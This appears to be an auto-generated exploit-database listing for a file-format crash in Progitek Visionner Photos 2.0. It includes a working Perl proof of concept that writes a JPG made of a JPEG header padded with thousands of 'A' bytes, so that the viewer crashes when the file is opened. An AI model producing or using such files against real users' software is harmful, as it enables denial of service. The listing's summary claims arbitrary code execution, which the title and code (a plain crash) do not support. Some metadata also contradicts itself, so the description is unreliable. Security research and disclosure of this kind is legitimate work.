Progitek Visionner Photos v2.0 - File Format DOS

vendor:

Visionner Photos

by:

antrhacks

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Visionner Photos

Affected Version From: 2.00

Affected Version To: 2.00

Patch Exists: Yes

Related CWE: N/A

CPE: a:progitek:visionner_photos:2.00

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 Home edition Fr

2020

Progitek Visionner Photos v2.0 – File Format DOS

This exploit is a buffer overflow vulnerability in Progitek Visionner Photos v2.0. The exploit is triggered when a specially crafted JPG file is opened in the application. The file contains a large amount of data which causes a buffer overflow, allowing an attacker to execute arbitrary code on the vulnerable system. The exploit is written in Perl and creates a malicious JPG file which contains a large amount of data, causing the buffer overflow.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.

Source

Exploit-DB raw data:

================================================
Progitek Visionner Photos v2.0 - File Format DOS
================================================

# Title: Progitek Visionner Photos v2.0 - File Format DOS
# Author: antrhacks
# Software Link: http://www.01net.com/outils/telecharger/windows/Multimedia/albmums_et_visionneuses/fiches/tele24929.html
# Version: 2.00
# Platform:  Windows XP SP3 Home edition Fr
# Have to place exploit in %HOMEDRIVE%\Program Files\Progitek\VisioPhotos\ by default


#!/usr/bin/perl

 
my $file= "exploit.jpg";
 
my $junk= "ÿØÿà JFIF" . "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" x  1019;
  
open($FILE, ">$file");

print($FILE $junk);

close($FILE);

print("[+] Your Exploit was created successfully");